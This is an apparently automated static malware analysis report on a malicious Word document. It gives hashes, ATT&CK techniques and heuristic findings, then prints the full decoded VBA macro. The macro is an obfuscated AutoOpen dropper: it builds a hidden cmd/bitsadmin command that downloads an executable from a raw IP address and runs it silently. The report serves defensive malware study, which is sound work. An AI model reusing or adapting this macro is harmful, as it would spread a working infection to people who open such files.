Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 115c18d207694542…

MALICIOUS

Office (OLE)

Size: 117.0 KB
Created: 2016-08-03 20:27:00
Authoring application: Microsoft Office Word
First seen: 2016-10-06
MD5: 2e374756930bee59c371d98ff88572a8
SHA-1: c5f3fd7570bd32edc44795a92c59965b4d9bbc08
SHA-256: 115c18d207694542dad0e876a36f1a64447a45fa2f78a0254f75799122810922
Risk Score: 168

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Word document containing VBA macros. It uses a common lure to trick users into enabling macros, which then execute the embedded VBA code. The VBA code contains a potential Shell call and a CreateObject call, indicating that it likely attempts to download and execute a second-stage payload.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
    Shell nUKaI61f, 0
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set SHswlL = CreateObject("vbscript.regexp")
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3927 bytes
SHA-256: 832ad71f3d8616cfee7e21a8a0f1f532fe7356c4a27eb0e09a0bcdeca72cc141
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function MJCTM(CWDMxZLy As String, FbIlx As String)
Const MiPNInTB = "usher"
Const VoTwTzi = 56413.774156729
ijrJGJ = 27499.72631798
Dim SMBLRBfVb
SMBLRBfVb = Empty
Dim UaeOs
UaeOs = Array()
Dim u6TmeUD
u6TmeUD = 104
ur6AH = Null
cxnTF = "l"
MJCTM = Replace(CWDMxZLy, FbIlx, "")
Dim pLTyDvz
pLTyDvz = Empty
pcIlatmCk = Array(230, -196, -2001184018, 42, True)
BnrkBExe = Array(10023, True, 53568, 247)
Dim WDYsMRc
WDYsMRc = 30721.11938915
Dim YzdUxwdTr As Integer
YzdUxwdTr = 6299
Dim lByiA
lByiA = Array()
Const zLddbe = "m"
Dim rIBoSu3Y
rIBoSu3Y = Null
Set SHswlL = CreateObject("vbscript.regexp")
QSdqj = Date
Const NFLd2 = 209
Dim twrPREK As Variant
twrPREK = Array()
Dim u5gdI As Variant
u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)
Const AiUVN = 130
Dim xrO5u As Boolean
xrO5u = False
Dim DtSd2 As Currency
DtSd2 = 24643
TxB7XFd = Array()
SHswlL.Pattern = FbIlx
Dim KWqu4PuM
KWqu4PuM = Array(18941)
Const PoTWMJbw = 4611
Const zvcqMHRt = 45690
Dim dBM7m
dBM7m = Array()
Dim Jhkf0ces
Jhkf0ces = 18334
Px3LN = Empty
Dim CP3XeR As Long
Dim QLnSIFu
QLnSIFu = "g"
Dim FjRfK
FjRfK = 37054
Dim lttYOFV As Byte
lttYOFV = 103
Dim hwbE4nQC
hwbE4nQC = 238
Dim HxZaHEuKH
HxZaHEuKH = ""
ZIGd3quHC = Date
efuU1j3i = 19822
CP3XeR = True
IsvteRd = True
Dim xrm3j
xrm3j = 0
Const wwBlWqvE = 32055
Dim YrDaO As Integer
YrDaO = -20549
Dim TQAPu
TQAPu = Empty
XFRbqp6x = False
QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)
Const ZLaDNPOM0 = 0
SHswlL.Global = CP3XeR
Dim BShA9 As Long
BShA9 = -652703950
Dim VLlsY
VLlsY = 173
Dim JrF8V
JrF8V = Null
Const YCxJyqzq = -23691
PlVOxYFG = "-31815"
Const QjPYL = 224
MJCTM = SHswlL.Replace(CWDMxZLy, "")
End Function

Sub AutoOpen()
Dim GUEQgl0 As Currency
GUEQgl0 = -4067
Dim wcUbOm
wcUbOm = Array()
Dim gq5z4s
gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)
oUJ1RH = 12730.522629119
Dim SYLDEIEHU As Long
SYLDEIEHU = -1851000800
Dim FtubqlSwF
FtubqlSwF = 194
Const nfYJAbOe = True
dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)
Dim nUKaI61f As String
Const EbPbjMfg = False
Dim ETBwFjm
ETBwFjm = Array()
qHfrpSwZq = -219635906
Dim uj0Cswp
uj0Cswp = 9
Dim kyyXvysya As Variant
kyyXvysya = Array()
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)
Dim jQsbW
jQsbW = Date
Dim J8pAjy As String
J8pAjy = "317eed7b"
zHgWO = -2086329278
kpmVq = Empty
BqXpmPanR = True
hRpGYfaRr = -426398108
Const IbHFT = "32500"
G3h5PwT = -13855
Shell nUKaI61f, 0
Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")
ORSXIMyL = -16892
Dim SGqXR
SGqXR = 16032.845284238
Const OFXiY = 34986.350534212
Dim xQWF3VrvY As Variant
xQWF3VrvY = Array()
dVrztZa = 0
JBwM8 = 14580.854766339
End Sub